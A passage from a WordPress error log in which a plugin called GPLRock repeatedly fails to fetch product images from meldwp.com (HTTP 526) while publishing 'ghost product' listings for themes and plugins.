fluffypaw-wordpress-theme-for-veterinary-clinic-pet-care-center after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:45:19 UTC] GPLRock: Image download failed for product fluffypaw-wordpress-theme-for-veterinary-clinic-pet-care-center (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:45:21 UTC] GPLRock: Image download failed for product fluffypaw-wordpress-theme-for-veterinary-clinic-pet-care-center (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:45:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fluffypaw---wordpress-theme-for-veterinary-clinic--pet-care-center-10203.webp for product fluffypaw-wordpress-theme-for-veterinary-clinic-pet-care-center after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:45:23 UTC] GPLRock WARNING: Image download failed for product fluffypaw-wordpress-theme-for-veterinary-clinic-pet-care-center. URL: https://meldwp.com/wp-content/uploads/fluffypaw---wordpress-theme-for-veterinary-clinic--pet-care-center-10203.webp [06-Apr-2026 18:45:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fluffypaw-wordpress-theme-for-veterinary-clinic-pet-care-center [06-Apr-2026 18:45:54 UTC] GPLRock: Image download failed for product html5-file-upload (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:45:56 UTC] GPLRock: Image download failed for product html5-file-upload (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:45:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/html5-file-upload-12197.webp for product html5-file-upload after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:45:58 UTC] GPLRock: Image download failed for product html5-file-upload (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:00 UTC] GPLRock: Image download failed for product html5-file-upload (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/html5-file-upload-12197.webp for product html5-file-upload after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:46:02 UTC] GPLRock WARNING: Image download failed for product html5-file-upload. URL: https://meldwp.com/wp-content/uploads/html5-file-upload-12197.webp [06-Apr-2026 18:46:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: html5-file-upload [06-Apr-2026 18:46:04 UTC] GPLRock: Image download failed for product prokit-flutter-flutter-ui-kit-with-chat-gpt-app (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:06 UTC] GPLRock: Image download failed for product prokit-flutter-flutter-ui-kit-with-chat-gpt-app (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/prokit-flutter---flutter-ui-kit-with-chat-gpt-app-23113.webp for product prokit-flutter-flutter-ui-kit-with-chat-gpt-app after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:46:08 UTC] GPLRock: Image download failed for product prokit-flutter-flutter-ui-kit-with-chat-gpt-app (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:10 UTC] GPLRock: Image download failed for product prokit-flutter-flutter-ui-kit-with-chat-gpt-app (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/prokit-flutter---flutter-ui-kit-with-chat-gpt-app-23113.webp for product prokit-flutter-flutter-ui-kit-with-chat-gpt-app after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:46:12 UTC] GPLRock WARNING: Image download failed for product prokit-flutter-flutter-ui-kit-with-chat-gpt-app. URL: https://meldwp.com/wp-content/uploads/prokit-flutter---flutter-ui-kit-with-chat-gpt-app-23113.webp [06-Apr-2026 18:46:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: prokit-flutter-flutter-ui-kit-with-chat-gpt-app [06-Apr-2026 18:46:13 UTC] GPLRock: Image downloaded successfully for product knowledge-base-helpdesk-support-wiki-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4570cae3.webp [06-Apr-2026 18:46:13 UTC] GPLRock: Using pre-downloaded image for product knowledge-base-helpdesk-support-wiki-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4570cae3.webp [06-Apr-2026 18:46:13 UTC] GPLRock: Ghost product published with image - Product ID: knowledge-base-helpdesk-support-wiki-wordpress-plugin [06-Apr-2026 18:46:13 UTC] GPLRock: Image download failed for product victheme-icons-wpbakery-page-builder-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:15 UTC] GPLRock: Image download failed for product victheme-icons-wpbakery-page-builder-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/victheme-icons---wpbakery-page-builder-addon-25418.webp for product victheme-icons-wpbakery-page-builder-addon after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:46:17 UTC] GPLRock: Image download failed for product victheme-icons-wpbakery-page-builder-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:19 UTC] GPLRock: Image download failed for product victheme-icons-wpbakery-page-builder-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/victheme-icons---wpbakery-page-builder-addon-25418.webp for product victheme-icons-wpbakery-page-builder-addon after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:46:21 UTC] GPLRock WARNING: Image download failed for product victheme-icons-wpbakery-page-builder-addon. URL: https://meldwp.com/wp-content/uploads/victheme-icons---wpbakery-page-builder-addon-25418.webp [06-Apr-2026 18:46:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: victheme-icons-wpbakery-page-builder-addon [06-Apr-2026 18:46:27 UTC] GPLRock: Image download failed for product on-scroll-animated-grid-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:29 UTC] GPLRock: Image download failed for product on-scroll-animated-grid-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/on-scroll-animated-grid-for-elementor-14344.webp for product on-scroll-animated-grid-for-elementor after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:46:37 UTC] GPLRock: Image download failed for product on-scroll-animated-grid-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:39 UTC] GPLRock: Image download failed for product on-scroll-animated-grid-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/on-scroll-animated-grid-for-elementor-14344.webp for product on-scroll-animated-grid-for-elementor after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:46:41 UTC] GPLRock WARNING: Image download failed for product on-scroll-animated-grid-for-elementor. URL: https://meldwp.com/wp-content/uploads/on-scroll-animated-grid-for-elementor-14344.webp [06-Apr-2026 18:46:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: on-scroll-animated-grid-for-elementor [06-Apr-2026 18:46:43 UTC] GPLRock: Image download failed for product woocommerce-payplug-payment-gateway-extension (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:45 UTC] GPLRock: Image download failed for product woocommerce-payplug-payment-gateway-extension (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-payplug-payment-gateway-extension-13768.webp for product woocommerce-payplug-payment-gateway-extension after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:46:47 UTC] GPLRock: Image download failed for product woocommerce-payplug-payment-gateway-extension (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:49 UTC] GPLRock: Image download failed for product woocommerce-payplug-payment-gateway-extension (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-payplug-payment-gateway-extension-13768.webp for product woocommerce-payplug-payment-gateway-extension after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:46:51 UTC] GPLRock WARNING: Image download failed for product woocommerce-payplug-payment-gateway-extension. URL: https://meldwp.com/wp-content/uploads/woocommerce-payplug-payment-gateway-extension-13768.webp [06-Apr-2026 18:46:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-payplug-payment-gateway-extension [06-Apr-2026 18:46:52 UTC] GPLRock: Image download failed for product recruitment-management-module-for-perfex-crm (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:54 UTC] GPLRock: Image download failed for product recruitment-management-module-for-perfex-crm (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/recruitment-management-module-for-perfex-crm-17698.webp for product recruitment-management-module-for-perfex-crm after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:46:56 UTC] GPLRock: Image download failed for product recruitment-management-module-for-perfex-crm (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:46:58 UTC] GPLRock: Image download failed for product recruitment-management-module-for-perfex-crm (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:47:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/recruitment-management-module-for-perfex-crm-17698.webp for product recruitment-management-module-for-perfex-crm after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:47:00 UTC] GPLRock WARNING: Image download failed for product recruitment-management-module-for-perfex-crm. URL: https://meldwp.com/wp-content/uploads/recruitment-management-module-for-perfex-crm-17698.webp [06-Apr-2026 18:47:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: recruitment-management-module-for-perfex-crm [06-Apr-2026 18:47:00 UTC] GPLRock: Image download failed for product woocommerce-products-meta-data-filters (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:47:03 UTC] GPLRock: Image download failed for product woocommerce-products-meta-data-filters (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:47:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-products-meta-data-filters-11849.webp for product woocommerce-products-meta-data-filters after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:47:05 UTC] GPLRock: Image download failed for product woocommerce-products-meta-data-filters (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:47:07 UTC] GPLRock: Image download failed for product woocommerce-products-meta-data-filters (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:47:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-products-meta-data-filters-11849.webp for product woocommerce-products-meta-data-filters after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:47:09 UTC] GPLRock WARNING: Image download failed for product woocommerce-products-meta-data-filters. URL: https://meldwp.com/wp-content/uploads/woocommerce-products-meta-data-filters-11849.webp [06-Apr-2026 18:47:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-products-meta-data-filters [06-Apr-2026 18:47:09 UTC] GPLRock: Image download failed for product premium-subscription-droppy-online-file-transfer-and-sharing (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:47:11 UTC] GPLRock: Image download failed for product premium-subscription-droppy-online-file-transfer-and-sharing (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:47:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/premium-subscription---droppy-online-file-transfer-and-sharing-21613.webp for product premium-subscription-droppy-online-file-transfer-and-sharing after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:47:14 UTC] GPLRock: Image download failed for product premium-subscription-droppy-online-file-transfer-and-sharing (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:47:16 UTC] GPLRock: Image download failed for product premium-subscription-droppy-online-file-transfer-and-sharing (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:47:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/premium-subscription---droppy-online-file-transfer-and-sharing-21613.webp for product premium-subscription-droppy-online-file-transfer-and-sharing after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:47:18 UTC] GPLRock WARNING: Image download failed for product premium-subscription-droppy-online-file-transfer-and-sharing. URL: https://meldwp.com/wp-content/uploads/premium-subscription---droppy-online-file-transfer-and-sharing-21613.webp [06-Apr-2026 18:47:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: premium-subscription-droppy-online-file-transfer-and-sharing [06-Apr-2026 18:47:18 UTC] GPLRock: Image downloaded successfully for product youtubomatic-automatic-post-generator-and-youtube-auto-poster-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4cc075d6.webp [06-Apr-2026 18:47:18 UTC] GPLRock: Using pre-downloaded image for product youtubomatic-automatic-post-generator-and-youtube-auto-poster-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4cc075d6.webp [06-Apr-2026 18:47:18 UTC] GPLRock: Ghost product published with image - Product ID: youtubomatic-automatic-post-generator-and-youtube-auto-poster-plugin-for-wordpress [06-Apr-2026 18:48:33 UTC] Cron reschedule event error for hook: action_scheduler_run_queue, Error code: could_not_set, Error message: The cron event list could not be saved., Data: {"schedule":"every_minute","args":["WP Cron"],"interval":60} [06-Apr-2026 18:48:50 UTC] GPLRock: Image download failed for product intro-personal-digital-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:48:52 UTC] GPLRock: Image download failed for product intro-personal-digital-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:48:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/intro---personal-digital-blog-wordpress-theme-4440.webp for product intro-personal-digital-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:48:54 UTC] GPLRock: Image download failed for product intro-personal-digital-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:48:56 UTC] GPLRock: Image download failed for product intro-personal-digital-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:48:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/intro---personal-digital-blog-wordpress-theme-4440.webp for product intro-personal-digital-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:48:59 UTC] GPLRock WARNING: Image download failed for product intro-personal-digital-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/intro---personal-digital-blog-wordpress-theme-4440.webp [06-Apr-2026 18:48:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: intro-personal-digital-blog-wordpress-theme [06-Apr-2026 18:48:59 UTC] GPLRock: Image download failed for product maxify-startup-business-news-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:01 UTC] GPLRock: Image download failed for product maxify-startup-business-news-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maxify--startup--business-news-wordpress-blog-theme-27194.webp for product maxify-startup-business-news-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:49:03 UTC] GPLRock: Image download failed for product maxify-startup-business-news-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:05 UTC] GPLRock: Image download failed for product maxify-startup-business-news-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maxify--startup--business-news-wordpress-blog-theme-27194.webp for product maxify-startup-business-news-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:49:07 UTC] GPLRock WARNING: Image download failed for product maxify-startup-business-news-wordpress-blog-theme. URL: https://meldwp.com/wp-content/uploads/maxify--startup--business-news-wordpress-blog-theme-27194.webp [06-Apr-2026 18:49:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: maxify-startup-business-news-wordpress-blog-theme [06-Apr-2026 18:49:08 UTC] GPLRock: Image download failed for product nest-multipurpose-ecommerce-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:10 UTC] GPLRock: Image download failed for product nest-multipurpose-ecommerce-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nest---multipurpose-ecommerce-html-template-21889.webp for product nest-multipurpose-ecommerce-html-template after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:49:12 UTC] GPLRock: Image download failed for product nest-multipurpose-ecommerce-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:14 UTC] GPLRock: Image download failed for product nest-multipurpose-ecommerce-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nest---multipurpose-ecommerce-html-template-21889.webp for product nest-multipurpose-ecommerce-html-template after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:49:16 UTC] GPLRock WARNING: Image download failed for product nest-multipurpose-ecommerce-html-template. URL: https://meldwp.com/wp-content/uploads/nest---multipurpose-ecommerce-html-template-21889.webp [06-Apr-2026 18:49:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nest-multipurpose-ecommerce-html-template [06-Apr-2026 18:49:17 UTC] GPLRock: Image download failed for product cuber-responsive-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:19 UTC] GPLRock: Image download failed for product cuber-responsive-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cuber--responsive-multipurpose-wordpress-theme-22103.webp for product cuber-responsive-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:49:21 UTC] GPLRock: Image download failed for product cuber-responsive-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:23 UTC] GPLRock: Image download failed for product cuber-responsive-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cuber--responsive-multipurpose-wordpress-theme-22103.webp for product cuber-responsive-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:49:26 UTC] GPLRock WARNING: Image download failed for product cuber-responsive-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cuber--responsive-multipurpose-wordpress-theme-22103.webp [06-Apr-2026 18:49:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cuber-responsive-multipurpose-wordpress-theme [06-Apr-2026 18:49:26 UTC] GPLRock: Image download failed for product edigit-wp-multi-purpose-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:28 UTC] GPLRock: Image download failed for product edigit-wp-multi-purpose-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edigit-wp---multi-purpose-elementor-woocommerce-theme-26102.webp for product edigit-wp-multi-purpose-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:49:30 UTC] GPLRock: Image download failed for product edigit-wp-multi-purpose-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:32 UTC] GPLRock: Image download failed for product edigit-wp-multi-purpose-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edigit-wp---multi-purpose-elementor-woocommerce-theme-26102.webp for product edigit-wp-multi-purpose-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:49:34 UTC] GPLRock WARNING: Image download failed for product edigit-wp-multi-purpose-elementor-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/edigit-wp---multi-purpose-elementor-woocommerce-theme-26102.webp [06-Apr-2026 18:49:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: edigit-wp-multi-purpose-elementor-woocommerce-theme [06-Apr-2026 18:49:35 UTC] GPLRock: Image download failed for product ariva-simple-text-based-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:37 UTC] GPLRock: Image download failed for product ariva-simple-text-based-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ariva---simple-text-based-wordpress-blog-theme-2344.webp for product ariva-simple-text-based-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:49:39 UTC] GPLRock: Image download failed for product ariva-simple-text-based-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:41 UTC] GPLRock: Image download failed for product ariva-simple-text-based-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ariva---simple-text-based-wordpress-blog-theme-2344.webp for product ariva-simple-text-based-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:49:43 UTC] GPLRock WARNING: Image download failed for product ariva-simple-text-based-wordpress-blog-theme. URL: https://meldwp.com/wp-content/uploads/ariva---simple-text-based-wordpress-blog-theme-2344.webp [06-Apr-2026 18:49:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ariva-simple-text-based-wordpress-blog-theme [06-Apr-2026 18:49:44 UTC] GPLRock: Image download failed for product hyani-bold-blog-and-magazine (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:46 UTC] GPLRock: Image download failed for product hyani-bold-blog-and-magazine (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hyani--bold-blog-and-magazine-7958.webp for product hyani-bold-blog-and-magazine after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:49:48 UTC] GPLRock: Image download failed for product hyani-bold-blog-and-magazine (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:50 UTC] GPLRock: Image download failed for product hyani-bold-blog-and-magazine (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hyani--bold-blog-and-magazine-7958.webp for product hyani-bold-blog-and-magazine after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:49:52 UTC] GPLRock WARNING: Image download failed for product hyani-bold-blog-and-magazine. URL: https://meldwp.com/wp-content/uploads/hyani--bold-blog-and-magazine-7958.webp [06-Apr-2026 18:49:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hyani-bold-blog-and-magazine [06-Apr-2026 18:49:52 UTC] GPLRock: Image download failed for product xeon-minimal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:54 UTC] GPLRock: Image download failed for product xeon-minimal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xeon---minimal-portfolio-wordpress-theme-6834.webp for product xeon-minimal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:49:57 UTC] GPLRock: Image download failed for product xeon-minimal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:49:59 UTC] GPLRock: Image download failed for product xeon-minimal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:50:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xeon---minimal-portfolio-wordpress-theme-6834.webp for product xeon-minimal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:50:01 UTC] GPLRock WARNING: Image download failed for product xeon-minimal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/xeon---minimal-portfolio-wordpress-theme-6834.webp [06-Apr-2026 18:50:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: xeon-minimal-portfolio-wordpress-theme [06-Apr-2026 18:50:01 UTC] GPLRock: Image download failed for product prala-backpack-traveler-blog-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:50:03 UTC] GPLRock: Image download failed for product prala-backpack-traveler-blog-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:50:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/prala---backpack-traveler-blog-elementor-wordpress-theme-9538.webp for product prala-backpack-traveler-blog-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:50:06 UTC] GPLRock: Image download failed for product prala-backpack-traveler-blog-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:50:08 UTC] GPLRock: Image download failed for product prala-backpack-traveler-blog-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:50:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/prala---backpack-traveler-blog-elementor-wordpress-theme-9538.webp for product prala-backpack-traveler-blog-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:50:10 UTC] GPLRock WARNING: Image download failed for product prala-backpack-traveler-blog-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/prala---backpack-traveler-blog-elementor-wordpress-theme-9538.webp [06-Apr-2026 18:50:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: prala-backpack-traveler-blog-elementor-wordpress-theme [06-Apr-2026 18:50:15 UTC] GPLRock: Image download failed for product modernize-flexibility-of-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:50:17 UTC] GPLRock: Image download failed for product modernize-flexibility-of-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:50:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/modernize---flexibility-of-wordpress-32185.webp for product modernize-flexibility-of-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:50:20 UTC] GPLRock: Image download failed for product modernize-flexibility-of-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:50:22 UTC] GPLRock: Image download failed for product modernize-flexibility-of-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:50:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/modernize---flexibility-of-wordpress-32185.webp for product modernize-flexibility-of-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:50:24 UTC] GPLRock WARNING: Image download failed for product modernize-flexibility-of-wordpress. URL: https://meldwp.com/wp-content/uploads/modernize---flexibility-of-wordpress-32185.webp [06-Apr-2026 18:50:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: modernize-flexibility-of-wordpress [06-Apr-2026 18:52:13 UTC] GPLRock: Image download failed for product spaciaz-real-estate-construction-group-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:15 UTC] GPLRock: Image download failed for product spaciaz-real-estate-construction-group-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/spaciaz--real-estate--construction-group-wordpress-theme-24757.webp for product spaciaz-real-estate-construction-group-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:52:18 UTC] GPLRock: Image download failed for product spaciaz-real-estate-construction-group-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:20 UTC] GPLRock: Image download failed for product 